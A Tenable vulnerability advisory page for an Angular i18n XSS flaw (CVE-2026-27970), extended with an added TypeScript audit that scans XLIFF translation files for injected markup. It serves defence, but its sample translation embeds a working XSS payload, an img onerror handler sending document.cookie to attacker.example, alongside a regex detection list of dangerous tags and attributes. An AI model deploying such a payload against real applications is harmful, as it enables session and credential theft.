SCA: security update for @angular/core (GHSA-prjf-86w9-mfqv)

high Tenable Cloud Security Plugin ID 438037

Description

There are packages installed that are affected by a vulnerability referenced in the following CVE:

- Angular is a development platform for building mobile and desktop web applications using
TypeScript/JavaScript and other languages. Versions prior to 21.2.0, 21.1.6, 20.3.17, and 19.2.19 have a
cross-site scripting (XSS) vulnerability in the Angular internationalization (i18n) pipeline. In ICU
(International Components for Unicode) messages, HTML in translated content was not properly sanitized
and could execute arbitrary JavaScript. Angular i18n typically involves three steps: extracting all
messages from an application in the source language, sending the messages out for translation, and
merging the translations back into the final source code. Translation is frequently contracted to
partner companies, so the source messages leave the project and come back as translation files whose
content is then displayed to end users. If the returned translations contain malicious content, it can
be rendered into the application and execute arbitrary JavaScript. When successfully exploited, this
vulnerability allows execution of attacker-controlled JavaScript in the application origin; depending on
the application being exploited, this could lead to credential exfiltration and/or page vandalism.
Several preconditions apply. The attacker must compromise the translation file (XLIFF, XTB, etc.), so
unlike most XSS vulnerabilities this issue is not exploitable by arbitrary users: an attacker must first
get malicious content into an application's translation file before it can reach the Angular
application's client side. The victim application must use Angular i18n, define and render one or more
ICU messages, and lack a Content Security Policy strict enough to block the injected script. Versions
21.2.0, 21.1.6, 20.3.17, and 19.2.19 patch the issue. Until the patch is applied, developers should
consider reviewing and verifying translated content received from untrusted third parties before
incorporating it in an Angular application, enabling strict CSP controls to block unauthorized
JavaScript from executing on the page, and enabling Trusted Types to enforce proper HTML sanitization.
(CVE-2026-27970)
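The "review and verify translated content" mitigation above is easiest to apply mechanically, at the
merge step of the three-step pipeline, before a returned translation file is checked in. The following
is an added example of such a pre-merge audit; it is not Angular's, Tenable's, or the advisory's code.
It assumes XLIFF 1.2 files of the shape `ng extract-i18n` produces (trans-unit/source/target elements,
with inline HTML and interpolations represented as `<x id="..."/>` placeholders, and each ICU expression
extracted as its own trans-unit), and the German translation file at the bottom is constructed for the
example, including the injected handler in the ICU select message. Any literal tag, script-bearing
attribute or `javascript:` URL in a target segment is reported, and ICU units are marked because that is
the code path this CVE affects; a placeholder-id mismatch between source and target is reported as a
secondary sanity check. The tag and attribute lists are a heuristic, not a complete HTML sanitizer.

```typescript
// Added example (not Angular's or Tenable's code): pre-merge audit of an Angular XLIFF 1.2
// translation file, flagging translations that carry literal HTML or script-bearing content.
// Assumptions: XLIFF 1.2 as emitted by `ng extract-i18n`, and the constructed sample file below.

interface TransUnit { id: string; source: string; target: string; }
interface Finding { id: string; isIcu: boolean; reason: string; }

// Angular extracts each ICU expression as its own trans-unit, e.g. "{VAR_PLURAL, plural, ...}".
const ICU_RE = /^\s*\{\s*[A-Za-z_]\w*\s*,\s*(plural|select|selectordinal)\s*,/;

// Markup and attributes that must never appear as literal text in a translation (heuristic list).
const DANGEROUS_RE =
  /<\s*(script|iframe|object|embed|svg|img|style|link|meta|base|form)\b|\bon[a-z]+\s*=|javascript\s*:|srcdoc\s*=/i;

// Minimal, tolerant XLIFF 1.2 extractor; regex-based on purpose so it runs without a DOM parser.
function parseXliff12(xml: string): TransUnit[] {
  const units: TransUnit[] = [];
  const unitRe = /<trans-unit\b[^>]*\bid="([^"]+)"[^>]*>([\s\S]*?)<\/trans-unit>/g;
  let m: RegExpExecArray | null;
  while ((m = unitRe.exec(xml)) !== null) {
    const body = m[2];
    const src = /<source\b[^>]*>([\s\S]*?)<\/source>/.exec(body);
    const tgt = /<target\b[^>]*>([\s\S]*?)<\/target>/.exec(body);
    units.push({ id: m[1], source: src ? src[1] : '', target: tgt ? tgt[1] : '' });
  }
  return units;
}

// Angular encodes inline HTML and interpolations as <x id="..."/> placeholders that are resolved
// from the source template, not from the translation. Collect their ids for comparison.
function placeholderIds(segment: string): string[] {
  const ids: string[] = [];
  const re = /<x\b[^>]*\bid="([^"]+)"[^>]*\/>/g;
  let m: RegExpExecArray | null;
  while ((m = re.exec(segment)) !== null) ids.push(m[1]);
  return ids.sort();
}

// Drop placeholders and decode XML entities so escaped markup such as &lt;img&gt; becomes visible.
function literalText(segment: string): string {
  return segment
    .replace(/<x\b[^>]*\/>/g, '')
    .replace(/&lt;/g, '<').replace(/&gt;/g, '>').replace(/&quot;/g, '"')
    .replace(/&apos;/g, "'").replace(/&#39;/g, "'").replace(/&amp;/g, '&');
}

function checkTranslations(units: TransUnit[]): Finding[] {
  const findings: Finding[] = [];
  for (const u of units) {
    const isIcu = ICU_RE.test(u.source);
    const text = literalText(u.target);
    if (/<[A-Za-z!\/]/.test(text)) {
      // Any literal tag is unexpected: legitimate markup arrives as <x/> placeholders, never as text.
      const reason = DANGEROUS_RE.test(text) ? 'dangerous markup in translation' : 'literal HTML in translation';
      findings.push({ id: u.id, isIcu, reason });
    } else if (DANGEROUS_RE.test(text)) {
      findings.push({ id: u.id, isIcu, reason: 'script-bearing attribute or URL in translation' });
    }
    const srcPh = placeholderIds(u.source).join(',');
    const tgtPh = placeholderIds(u.target).join(',');
    if (srcPh !== tgtPh) {
      findings.push({ id: u.id, isIcu, reason: `placeholder mismatch: source [${srcPh}] target [${tgtPh}]` });
    }
  }
  return findings;
}

function auditXliff(xml: string): Finding[] {
  return checkTranslations(parseXliff12(xml));
}

// Constructed sample: a returned German translation file whose third unit, an ICU select message,
// carries an injected image tag with an onerror handler (the host name is a placeholder).
const SAMPLE_XLIFF = `<?xml version="1.0" encoding="UTF-8" ?>
<xliff version="1.2" xmlns="urn:oasis:names:tc:xliff:document:1.2">
  <file source-language="en" target-language="de" datatype="plaintext" original="ng2.template">
    <body>
      <trans-unit id="greeting" datatype="html">
        <source>Hello, <x id="INTERPOLATION" equiv-text="{{name}}"/>!</source>
        <target>Hallo, <x id="INTERPOLATION" equiv-text="{{name}}"/>!</target>
      </trans-unit>
      <trans-unit id="itemCount" datatype="html">
        <source>{VAR_PLURAL, plural, =0 {no items} =1 {one item} other {<x id="INTERPOLATION"/> items}}</source>
        <target>{VAR_PLURAL, plural, =0 {keine Artikel} =1 {ein Artikel} other {<x id="INTERPOLATION"/> Artikel}}</target>
      </trans-unit>
      <trans-unit id="statusMsg" datatype="html">
        <source>{VAR_SELECT, select, ok {All good} other {Check status}}</source>
        <target>{VAR_SELECT, select, ok {Alles gut} other {&lt;img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)"&gt;Status pruefen}}</target>
      </trans-unit>
    </body>
  </file>
</xliff>`;

// Usage: run over every returned translation file and fail the merge when anything is reported.
const sampleFindings = auditXliff(SAMPLE_XLIFF);
for (const f of sampleFindings) console.log(`[${f.isIcu ? 'ICU' : 'text'}] ${f.id}: ${f.reason}`);
```

Run against the sample, the audit reports only the `statusMsg` unit, marked as ICU, with reason
"dangerous markup in translation"; the two benign units pass because their placeholder sets match and
their text contains no literal markup. This check reduces the chance of merging a tampered file, but it
does not replace upgrading to a patched Angular version, nor the CSP and Trusted Types controls the
advisory recommends.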

See Also

https://github.com/advisories/GHSA-prjf-86w9-mfqv

Plugin Details

Severity: High

ID: 438037

Version: Revision 1.3

Type: Local

Family: SCA Checks

Published: 3/2/2026

Updated: 3/16/2026

Supported Sensors: Tenable Cloud Security, Tenable Self-Hosted Container Security

Risk Information

VPR

Risk Factor: Low

Score: 2.3

Percentile: 9.42

Vendor

Vendor Severity: High

CVSS v2

Risk Factor: Medium

Base Score: 6.4

Temporal Score: 4.7

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N

CVSS Score Source: CVE-2026-27970

CVSS v3

Risk Factor: Medium

Base Score: 6.1

Temporal Score: 5.3

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

CVSS v4

Risk Factor: High

Base Score: 7.6

Threat Score: 4.9

Threat Vector: CVSS:4.0/E:U

Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

Vulnerability Information

Exploit Ease: No known exploits are available

Patch Publication Date: 2/27/2026

Vulnerability Publication Date: 2/26/2026

Reference Information

CVE: CVE-2026-27970

CWE: CWE-79